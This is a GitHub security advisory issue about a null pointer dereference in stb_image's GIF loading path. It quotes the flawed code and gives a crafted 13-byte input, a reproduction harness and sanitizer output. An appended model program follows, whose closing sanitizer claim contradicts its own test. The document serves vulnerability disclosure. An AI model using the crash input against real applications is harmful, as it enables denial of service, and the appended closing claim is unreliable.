
Null pointer dereference because of an uninitialized variable (GHSL-2023-151/CVE-2023-45667) #1550

Open
JarLob opened this issue Oct 19, 2023 · 0 comments · May be fixed by #1551

Comments


JarLob commented Oct 19, 2023

If stbi__load_gif_main, called from stbi_load_gif_from_memory [1], fails, it returns a null pointer and may leave the z variable uninitialized. If the caller has also set the flip-vertically flag [2], execution continues and stbi__vertical_flip_slices [3] is called with the null result pointer and the uninitialized z value.

STBIDEF stbi_uc *stbi_load_gif_from_memory(stbi_uc const *buffer, int len, int **delays, int *x, int *y, int *z, int *comp, int req_comp)
{
   unsigned char *result;
   stbi__context s;
   stbi__start_mem(&s,buffer,len);

   result = (unsigned char*) stbi__load_gif_main(&s, delays, x, y, z, comp, req_comp); // [1]
   if (stbi__vertically_flip_on_load) { // [2]
      stbi__vertical_flip_slices( result, *x, *y, *z, *comp ); // [3]
   }

   return result;
}

Whether the program enters the loop depends on the value of z [4]; if it does, it attempts to dereference the null pointer in stbi__vertical_flip [5].

static void stbi__vertical_flip_slices(void *image, int w, int h, int z, int bytes_per_pixel)
{
   int slice;
   int slice_size = w * h * bytes_per_pixel;

   stbi_uc *bytes = (stbi_uc *)image;
   for (slice = 0; slice < z; ++slice) { // [4]
      stbi__vertical_flip(bytes, w, h, bytes_per_pixel); // [5]
      bytes += slice_size;
   }
}

Impact

This issue may lead to denial of service.

Resources

To reproduce the issue in stbi__vertical_flip_slices:

  1. Make MSAN build of the following program:
#include <stdint.h>
#define STB_IMAGE_IMPLEMENTATION
#include "../stb_image.h"

int main(int argc, char* argv[])
{
    const uint8_t data[] = {0x47,0x49,0x38,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x35,0xff};
    size_t size = sizeof(data);

    stbi_set_flip_vertically_on_load(1);
    int x, y, z, channels;
    stbi_uc *img = stbi_load_gif_from_memory(data, size, NULL, &x, &y, &z, &channels, 4);
    stbi_image_free(img);
    return 0;
}
  2. Set a breakpoint at line 1251 in stbi__vertical_flip_slices and run the program to hit the use of the uninitialized memory.
==292219==WARNING: MemorySanitizer: use-of-uninitialized-value
    #0 0x4b0ad6 in stbi__vertical_flip_slices(void*, int, int, int, int) tests/../stb_image.h:1251:4
    #1 0x4ad19e in stbi_load_gif_from_memory tests/../stb_image.h:1450:7
JarLob added a commit to JarLob/stb that referenced this issue Oct 19, 2023
Call `stbi__vertical_flip_slices` only if the previous function didn't fail. Fixes nothings#1550
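The following is an added example, not code from stb_image or from the issue author. It models the wrapper structure described in the report with a constructed stand-in loader (a toy `[w][h][z][comp]` header plus pixel bytes, not a GIF parser) so the two paths can be exercised without the library: the failing path, where the loader returns NULL and never writes `*z`, and the success path, where each frame's rows are reversed. The wrapper carries the guard from the fix, so the flip is only reached when the loader succeeded. All function names prefixed `model_` are assumptions made for this example.

```c
/* Added example (not stb_image's code): a small model of the GIF wrapper
 * showing the failing-path hazard from the report and the guarded fix.
 * The loader below is a constructed stand-in, not a GIF parser. */
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

typedef unsigned char stbi_uc;

static int model_flip_on_load = 0;   /* stands in for stbi__vertically_flip_on_load */

/* Stand-in for stbi__load_gif_main. Toy format (constructed for this
 * example): header bytes [w][h][z][comp] followed by w*h*z*comp pixel bytes.
 * Like the real function on its failure path, it returns NULL and writes
 * nothing to *z when the header is truncated or the pixel data is short. */
static stbi_uc *model_load_gif_main(const stbi_uc *buf, int len,
                                    int *x, int *y, int *z, int *comp)
{
    if (len < 4) return NULL;                 /* truncated header: *z untouched */
    int w = buf[0], h = buf[1], frames = buf[2], c = buf[3];
    size_t need = (size_t)w * h * frames * c;
    if (w == 0 || h == 0 || frames == 0 || c == 0 || (size_t)(len - 4) < need)
        return NULL;                          /* still no write to *z */
    stbi_uc *out = malloc(need);
    if (!out) return NULL;
    memcpy(out, buf + 4, need);
    *x = w; *y = h; *z = frames; *comp = c;
    return out;
}

/* Same row swap stbi__vertical_flip performs. It dereferences image,
 * so it must never be reached with a NULL result. */
static void model_vertical_flip(stbi_uc *image, int w, int h, int bpp)
{
    size_t row = (size_t)w * bpp;
    for (int r = 0; r < h / 2; ++r) {
        stbi_uc *a = image + (size_t)r * row;
        stbi_uc *b = image + (size_t)(h - 1 - r) * row;
        for (size_t i = 0; i < row; ++i) { stbi_uc t = a[i]; a[i] = b[i]; b[i] = t; }
    }
}

static void model_vertical_flip_slices(stbi_uc *image, int w, int h, int z, int bpp)
{
    size_t slice = (size_t)w * h * bpp;
    for (int s = 0; s < z; ++s) {          /* iteration count comes from z */
        model_vertical_flip(image, w, h, bpp);
        image += slice;
    }
}

/* Wrapper with the report's structure plus the guard from the fix: flip
 * only when the loader succeeded. Without the result check, a NULL result
 * reaches the slice loop with an uninitialized z, and any z > 0 dereferences NULL. */
static stbi_uc *model_load_gif_from_memory(const stbi_uc *buf, int len,
                                          int *x, int *y, int *z, int *comp)
{
    stbi_uc *result = model_load_gif_main(buf, len, x, y, z, comp);
    if (result && model_flip_on_load)
        model_vertical_flip_slices(result, *x, *y, *z, *comp);
    return result;
}

/* Failing path: a truncated buffer with flip enabled must return NULL
 * and leave the caller's z untouched (the -1 sentinel survives). */
static int check_truncated_input_is_safe(void)
{
    static const stbi_uc trunc[] = { 2, 2 };  /* constructed: header cut short */
    int x = 0, y = 0, z = -1, comp = 0;
    model_flip_on_load = 1;
    stbi_uc *img = model_load_gif_from_memory(trunc, (int)sizeof trunc, &x, &y, &z, &comp);
    int ok = (img == NULL) && (z == -1);
    free(img);
    return ok;
}

/* Success path: two 2x2 single-channel frames, rows reversed per frame. */
static int check_valid_input_is_flipped(void)
{
    static const stbi_uc gif[] = { 2, 2, 2, 1,
                                   1, 2,  3, 4,       /* frame 0 rows */
                                   5, 6,  7, 8 };     /* frame 1 rows */
    static const stbi_uc want[] = { 3, 4, 1, 2,  7, 8, 5, 6 };
    int x = 0, y = 0, z = 0, comp = 0;
    model_flip_on_load = 1;
    stbi_uc *img = model_load_gif_from_memory(gif, (int)sizeof gif, &x, &y, &z, &comp);
    int ok = img && x == 2 && y == 2 && z == 2 && comp == 1 &&
             memcmp(img, want, sizeof want) == 0;
    free(img);
    return ok;
}

int main(void)
{
    return (check_truncated_input_is_safe() && check_valid_input_is_flipped()) ? 0 : 1;
}
```

Run under MemorySanitizer with the `result &&` guard removed and the failing-path check will trip on the read of `z`, which is the same report MSAN produces against the real library above; with the guard in place both checks pass and the truncated input simply yields NULL.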